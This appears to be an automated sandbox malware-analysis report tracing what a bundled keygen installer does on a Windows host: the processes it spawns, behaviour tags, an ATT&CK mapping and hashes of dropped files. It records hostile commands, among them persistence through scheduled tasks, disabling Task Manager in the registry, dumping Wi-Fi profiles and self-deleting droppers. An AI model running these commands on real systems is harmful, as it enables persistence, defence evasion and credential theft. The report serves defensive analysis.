"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qATVyEXYNcqQZF" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1555.tmp"
5⤵
- Creates scheduled task(s)
PID:4116

C:\Users\Admin\AppData\Roaming\26.exe
"{path}"
5⤵
PID:4580

C:\Users\Admin\AppData\Roaming\27.exe
C:\Users\Admin\AppData\Roaming\27.exe
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4016

C:\Users\Admin\AppData\Roaming\27.exe
C:\Users\Admin\AppData\Roaming\27.exe /C
5⤵
PID:4092

C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
5⤵
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
PID:4356

C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe /C
6⤵
PID:3924

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
6⤵
PID:3664

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
6⤵
PID:1948

C:\Windows\SysWOW64\mobsync.exe
C:\Windows\SysWOW64\mobsync.exe
6⤵
PID:2256

C:\Windows\SysWOW64\mobsync.exe
C:\Windows\SysWOW64\mobsync.exe
6⤵
PID:2168

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
6⤵
PID:2116

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
6⤵
PID:5028

C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe" /W
6⤵
PID:3820

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn {D67AEED2-E6B3-46A8-A598-592545B18773} /tr "\"C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe\"" /sc HOURLY /mo 5 /F
6⤵
- Creates scheduled task(s)
PID:2016

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn axhotbr /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I axhotbr" /SC ONCE /Z /ST 17:28 /ET 17:40
5⤵
- Creates scheduled task(s)
PID:4564

C:\Users\Admin\AppData\Roaming\28.exe
C:\Users\Admin\AppData\Roaming\28.exe
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:4084

C:\Users\Admin\AppData\Roaming\29.exe
C:\Users\Admin\AppData\Roaming\29.exe
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2548

C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\29.dll f1 C:\Users\Admin\AppData\Roaming\29.exe@2548
5⤵
PID:1600

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\29.dll,f0
6⤵
- Blocklisted process makes network request
PID:3596

C:\Users\Admin\AppData\Roaming\30.exe
C:\Users\Admin\AppData\Roaming\30.exe
4⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"
5⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:4948

C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
6⤵
- Modifies registry key
PID:3552

C:\Windows\SysWOW64\netsh.exe
"netsh" wlan show profile
6⤵
PID:4724

C:\Users\Admin\AppData\Roaming\31.exe
C:\Users\Admin\AppData\Roaming\31.exe
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:3324

C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe
"C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe"
2⤵
- Executes dropped EXE
PID:488

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen.bat" "
3⤵
PID:3904

C:\Users\Admin\AppData\Local\Temp\RarSFX1\intro.exe
intro.exe 1O5ZF
4⤵
- Modifies system certificate store
PID:2228

C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
4⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe"
5⤵
PID:4452

C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe -txt -scanlocal -file:potato.dat
6⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exe
keygen-step-1.exe
4⤵
PID:2140

C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe
keygen-step-2.exe
4⤵
- Suspicious use of SetWindowsHookEx
PID:2016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe" >> NUL
5⤵
PID:2196

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:2296

C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe
keygen-step-3.exe
4⤵
PID:3704

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe"
5⤵
PID:2288

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:5064

C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exe
keygen-step-4.exe
4⤵
PID:3792

C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:4224

C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe"
5⤵
PID:2992

C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe
"C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe" -s
6⤵
PID:4812

C:\Program Files (x86)\9ku5npt6tedk\aliens.exe
"C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
7⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3752

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
8⤵
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:2852

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
8⤵
PID:1220

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
9⤵
- Runs ping.exe
PID:3816

C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe"
5⤵
PID:2736

C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Roaming\2.exe"
3⤵
PID:2532

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3636

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Roaming\18.exe"
3⤵
PID:3000

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:3844

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1548

C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
2⤵
PID:3100

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
2⤵
PID:2768

C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:4560

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Roaming\11.exe"
3⤵
PID:4420

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2416

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1568

C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe
"C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe"
2⤵
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:3432

C:\Windows\SysWOW64\help.exe
"C:\Windows\SysWOW64\help.exe"
2⤵
PID:1972

C:\Windows\SysWOW64\colorcpl.exe
"C:\Windows\SysWOW64\colorcpl.exe"
2⤵
PID:4976

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5052

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4032

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
2⤵
PID:3692

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4680

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2412

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\SysWOW64\ipconfig.exe"
2⤵
- Gathers network information
PID:5272

C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe
"C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe"
2⤵
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
PID:5768

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4FE5.tmp"
3⤵
- Creates scheduled task(s)
PID:1680

C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe
"{path}"
3⤵
- Suspicious use of SetThreadContext
PID:4616

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5020

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:3580

C:\Windows\SysWOW64\NETSTAT.EXE
"C:\Windows\SysWOW64\NETSTAT.EXE"
4⤵
- Gathers network information
PID:2920

C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
2⤵
PID:2312

C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
2⤵
PID:4708

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:3256

C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4424

C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
2⤵
PID:3640

C:\Windows\SysWOW64\msdt.exe
"C:\Windows\SysWOW64\msdt.exe"
2⤵
PID:5612

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2280

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x520
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\system32\taskeng.exe
taskeng.exe {9ED4442B-3F45-4DFB-955D-CC52BE690C72} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]
1⤵
PID:3216

C:\Programdata\RealtekHD\taskhost.exe
C:\Programdata\RealtekHD\taskhost.exe
2⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
PID:3516

C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
3⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
4⤵
PID:2744

C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
5⤵
PID:3448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
4⤵
PID:2144

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
5⤵
PID:3308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
4⤵
PID:5440

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
5⤵
PID:5756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
4⤵
PID:2104

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
5⤵
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
4⤵
PID:3572

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
5⤵
PID:3836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\wWTxgR" /F
4⤵
PID:2976

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /TN "Updates\wWTxgR" /F
5⤵
PID:4320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\wWTxgR" /F
4⤵
PID:1304

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /TN "Updates\wWTxgR" /F
5⤵
PID:5296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
3⤵
PID:3324

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
2⤵
PID:3420

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
2⤵
PID:4856

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
2⤵
PID:1444

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
2⤵
PID:2980

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
2⤵
PID:5128

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
2⤵
PID:688

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
2⤵
PID:5864

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
PID:2264

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C715B638DCD0275E9924148DADA4DC31 C
2⤵
PID:3588

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7149B171DBF515120FD73317ACE2DD0E C
2⤵
PID:5836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: LoadsDriver
PID:3608

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5940

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x224
1⤵
PID:5656

C:\Windows\system32\taskeng.exe
taskeng.exe {A93D8764-8FF3-462F-8120-46B3D3608D96} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:4540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

File Deletion

T1107

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

File Permissions Modification

T1222

Scripting

T1064

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\9ku5npt6tedk\aliens.exe

Download Submit
C:\Program Files (x86)\9ku5npt6tedk\aliens.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

Download Submit
C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe

Download Submit
C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe

Download Submit
C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

Download Submit
C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

Download Submit
C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

Download Submit
C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

Download Submit
C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

Download Submit
C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe

Download Submit
C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe

Download Submit
C:\Program Files\Common Files\System\iediagcmd.exe

Download Submit
C:\ProgramData\ADiag\Debug\Adlice Diag_debug.log

Download Submit
C:\ProgramData\ADiag\advert

Download Submit
C:\ProgramData\ADiag\config.ini

Download Submit
C:\ProgramData\ADiag\scheduler

Download Submit
C:\ProgramData\Microsoft\Check\Check.txt

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta

Download Submit
C:\ProgramData\Microsoft\temp\Log.txt

Download Submit
C:\ProgramData\RDPWinst.exe

Download Submit
C:\ProgramData\RealtekHD\taskhost.exe

Download Submit
C:\ProgramData\RealtekHD\taskhost.exe

Download Submit
C:\ProgramData\RealtekHD\taskhost.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\WindowsTask\OpenCL.DLL

Download Submit
C:\ProgramData\WindowsTask\azur.exe

Download Submit
C:\ProgramData\WindowsTask\azur.exe

Download Submit
C:\ProgramData\WindowsTask\system.exe
MD5
49e31c4bcd9f86ba897dc7e64176dc50

SHA1
cbf0134bd25fd631c3baae23b9e5c79dffef870a

SHA256
006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

SHA512
b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

Download Submit
C:\ProgramData\WindowsTask\system.exe
MD5
49e31c4bcd9f86ba897dc7e64176dc50

SHA1
cbf0134bd25fd631c3baae23b9e5c79dffef870a

SHA256
006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

SHA512
b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

Download Submit
C:\ProgramData\WindowsTask\update.exe
MD5
c830b8a074455cc0777ed5bc0bfd2678

SHA1
bff2a96c092f8c5620a4d4621343594cd8892615

SHA256
3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

SHA512
c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

Download Submit
C:\ProgramData\WindowsTask\update.exe
MD5
c830b8a074455cc0777ed5bc0bfd2678

SHA1
bff2a96c092f8c5620a4d4621343594cd8892615

SHA256
3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

SHA512
c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe
MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\install.vbs

Download Submit
C:\ProgramData\Windows\reg1.reg

Download Submit
C:\ProgramData\Windows\reg2.reg

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll
MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll
MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Download Submit
C:\ProgramData\Windows\winit.exe

Download Submit
C:\ProgramData\install\cheat.exe

Download Submit
C:\ProgramData\install\utorrent.exe
MD5
8590e82b692b429189d114dda535b6e8

SHA1
5d527ad806ac740e2e2769f149270be6a722e155

SHA256
af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

SHA512
